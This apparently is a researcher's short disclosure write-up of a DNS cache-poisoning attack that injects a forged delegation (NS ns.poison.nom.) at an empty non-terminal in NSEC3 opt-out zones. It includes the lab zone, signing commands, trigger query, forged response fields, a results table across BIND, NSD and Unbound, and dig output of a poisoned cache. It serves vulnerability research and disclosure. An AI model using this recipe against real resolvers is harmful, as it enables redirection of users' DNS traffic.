Forged Delegation Injection into Empty Non-Terminal with NSEC3

Tsunehiko Suzuki, 2018/01/12

Abstract

NSEC3 is broken ... (especially dnssec-signzone)

1. Target Zone

  ; RFC 5155 Appendix A. Example Zone and optional records for ENT
  example.           IN SOA ns1.example. bugs.x.w.example. 1 3600 300 3600000 3600
  example.           IN NS  ns1.example.
  ns1.example.       IN A   192.168.11.1
  example.           IN MX  1 xx.example.
  ; for making empty non-terminal "gov.example"
  ex.gov.example.    IN NS  ns.ex.gov.example.
  ns.ex.gov.example. IN A   192.168.11.21

with opt-out NSEC3 sign
# dnssec-signzone -P -A -H 12 -3 aabbccdd ...
# ldns-signzone -n -p -t 12 -s aabbccdd ...

2. Attack

Trigger Query

<random>.gov.example. IN A

Forged Response

Flag: AA=0
Authority Section: gov.example. IN NS ns.poison.nom. ; (forged delegation)

3. Result

	BIND + ldns-signzone	BIND + dnssec-signzone	NSD + ldns-signzone	NSD + dnssec-signzone
BIND + nxdomain.ENT	NXDOMAIN	NXDOMAIN	NXDOMAIN	SERVFAIL *1 (NXDOMAIN with +cd)
BIND + NS_of_ENT	NODATA	NODATA	NODATA	NODATA
BIND + attack	SERVFAIL *2 (poisoned with +cd)	POISONED	SERVFAIL *2 (poisoned with +cd)	SERVFAIL *2 (poisoned with +cd)
Unbound + nxdomain.ENT	NXDOMAIN	NXDOMAIN	NXDOMAIN	SERVFAIL *1 (NXDOMAIN with -o CD)
Unbound + NS_of_ENT	NODATA	NODATA	NODATA	NODATA
Unbound + attack	N/A	POISONED	N/A	N/A

nxdomain.ENT = `dig -t a foobar.gov.example.`
NS_of_ENT = `dig -t ns gov.example.`

*1 : Inspite of the presentation at OARC25, NSD looks like being broken. You can try SERVFAIL with 'NSD + ENT + opt-out + dnssec-signzone' by `dig foobar.gov.mufj.jp @8.8.8.8 +nocd +dnssec`. ("Gov.mufj.jp" is ENT. There is insecure "sub.gov.mufj.jp" zone.)

*2 : After attack, poisoned cache can be seen with `dig +cd`.

POISONED result

# dig a ns.ex.gov.example 

; <<>> DiG 9.11.2 <<>> a ns.ex.gov.example
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 64666
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: ca9abd03a0e3723cb190f4255a51f34843c7d1f72b3ed00d (good)
;; QUESTION SECTION:
;ns.ex.gov.example.        IN  A

;; ANSWER SECTION:
ns.ex.gov.example.   1800  IN  A   127.0.0.1

;; AUTHORITY SECTION:
gov.example.        48362  IN  NS  ns.poison.nom.

;; Query time: 0 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Sun Jan 07 19:15:36 JST 2018
;; MSG SIZE  rcvd: 119

Conclusion

... NSEC3 is broken ... (especially dnssec-signzone)

Is the NSEC3 proofing what?

Environment

Content Server	BIND 9.11.2	NSD 4.1.12
Cache Server	BIND 9.11.2	Unbound 1.5.10
sign tool	dnssec-signzone 9.11.2	ldns-signzone 1.6.17

References

Explanation of RFC 5155 with example (2017.9.16/2017.1.12): http://www.e-ontap.com/dns/onsen4/rfc5155.html(Japanese)
ENT was here!!! (dns-operations ML): https://lists.dns-oarc.net/pipermail/dns-operations/2016-June/thread.html#15011
ENT was here!!! (DNS-OARC 25, Dallas, 10/2016):https://indico.dns-oarc.net/event/25/session/4/contribution/4/material/slides/0.pdf
Opened Pandora's box of Cache Poisoning -1- (2014.4):
http://www.e-ontap.com/dns/endofdns-e.html(English)
http://www.e-ontap.com/dns/endofdns.html(Japanese)
Opened Pandora's box of Cache Poisoning -2-: (2014.4)
http://www.e-ontap.com/dns/endofdns2-e.html(English)
http://www.e-ontap.com/dns/endofdns2.html(Japanese)
Truth of Poisoning (2015.10): http://www.e-ontap.com/dns/poisoning_spa/ (Japanese)
Truth of Kaminsky Bug (2011.10): http://www.e-ontap.com/dns/bindmatrix.html(Japanese)
(Well-known)"Redirect the target domain's nameserver" cache poisoning attacks (2014.7,JPRS@IEPG): https://iepg.org/2014-07-20-ietf90/201407-poisoning.pdf
"IMPROVED DNS SPOOFING USING NODE RE-DELEGATION" (2008.7, B.Mueller): https://www.sec-consult.com/wp-content/uploads/files/whitepapers/SEC-Consult_Whitepaper_whitepaper-dns-node-redelegation.pdf

Tsunehiko Suzuki / Chukyo University / tss at e-ontap.com / 2018.1.7